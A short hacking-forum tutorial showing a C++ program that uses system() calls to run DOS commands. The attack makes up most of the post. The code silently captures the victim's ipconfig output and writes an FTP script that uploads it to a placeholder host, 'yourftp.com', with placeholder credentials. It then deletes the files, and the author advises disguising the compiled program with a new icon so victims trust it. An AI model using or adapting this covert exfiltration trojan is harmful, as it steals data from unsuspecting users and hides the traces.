Join us at IRC!
Few are those who can see with their own eyes and hear with their own hearts. - Albert Einstein
Thursday, May 17, 2012
Navigation
Members Online
Total Online: 33
Web Spiders: 17
Guests Online: 28
Members Online: 5

Registered Members: 70039
Newest Member: p0isoN
Latest Articles

Programming the perfect customized batch



FLV Blaster - Download Music and Videos Faster

website security A new way of writing programs that interact with DOS..



Well many people have used the function but never thought about using it destructivly(or educationally speaking, secuirity flaw).

All that is required is the following:
- Minor C++ knowledge.
- Digital Mars/VisualC++/BorlandC++/Any C++ compiler

LETS BEGIN!

Ok well lets start with something simple but effective.. ip logging users that use your program.

The code would be:
[START CODE]

#include "iostream.h"
#include "windows.h"
#include "dos.h"

using namespace std;

int main()
{
system("cls");
system("ipconfig>>C:ip.txt");
system("echo open>>C:ftp.txt");
system("echo yourftp.com>>C:ftp.txt");
system("echo ftpuser>>C:ftp.txt");
system("echo ftppass>>C:ftp.txt");
system("echo send C:ip.txt>>C:ftp.txt");
system("echo close>>C:ftp.txt");
system("echo bye>>C:ftp.txt");
system("cls");
system("FTP -s:C:ftp.txt");
system("cls");
system("del C:ftp.txt");
system("del C:ip.txt");
system("cls");
return 0;
}

[END CODE]
you see same exact thing as bats except it has system(""); around it. very simple.

Then just compile your program. Change the icon. do whatever, its more beleavable and can be scanned, and u dont need to bind 2 files.

I hope this tut helps u out in one way or another.

BYE!
--Haykuro

Comments

BlackAce227 on March 06 2005 - 22:14:00
ive seen this scblockedript alot. :|
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.
Ratings
Rating is available to members only.

Please login or register to vote.

Awesome! 0% [No Votes]
Very Good 50% [1 Vote]
Good 0% [No Votes]
Average 0% [No Votes]
Poor 50% [1 Vote]
Guest
Username

Password

Remember Me


Bookmark This Page
Affiliates
Adverts

 

 

Links
By using, viewing or obtaining any information contained on this site, you agree to the disclaimer.

© HellBound Hackers 2008- 2009. Since 3rd December 2004.